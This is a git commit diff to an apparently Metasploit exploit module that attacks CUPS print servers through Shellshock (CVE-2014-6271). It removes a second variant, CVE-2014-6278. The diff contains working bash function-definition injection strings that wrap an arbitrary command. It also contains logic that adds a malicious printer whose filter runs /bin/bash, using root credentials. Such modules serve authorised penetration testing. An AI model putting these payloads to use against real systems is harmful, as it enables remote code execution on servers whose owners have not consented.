Remove CVE-2014-6278

bcoles · bcoles · commit 78b199fe7234 · 2014-10-28T16:18:24.000Z
diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb
@@ -19,7 +19,6 @@ def initialize(info = {})
       },
       'Author' => [
         'Stephane Chazelas', # Vulnerability discovery
-        'lcamtuf', # CVE-2014-6278
         'Brendan Coles <bcoles[at]gmail.com>' # msf
       ],
       'References' => [
@@ -54,7 +53,6 @@ def initialize(info = {})
       OptBool.new('SSL', [ true, 'Use SSL', true ]),
       OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
       OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
-      OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
       OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
     ], self.class)
   end
@@ -66,13 +64,6 @@ def cve_2014_6271(cmd)
     %{() { :;}; $(#{cmd}) & }
   end
 
-  #
-  # CVE-2014-6278
-  #
-  def cve_2014_6278(cmd)
-    %{() { _; } >_[$($())] { $(#{cmd}) & }}
-  end
-
   #
   # Check credentials
   #
@@ -107,17 +98,9 @@ def exploit
     @cookie = rand_text_alphanumeric(16)
     printer_name = rand_text_alphanumeric(10 + rand(5))
 
-    # Select target CVE
-    case datastore['CVE']
-    when 'CVE-2014-6278'
-      cmd = cve_2014_6278(payload.raw)
-    else
-      cmd = cve_2014_6271(payload.raw)
-    end
-
     # Add a printer containing the payload
     # with a CUPS filter pointing to /bin/bash
-    res = add_printer(printer_name, cmd)
+    res = add_printer(printer_name, cve_2014_6271(payload.raw))
     if !res
       fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
     elsif res.body =~ /Set Default Options for #{printer_name}/
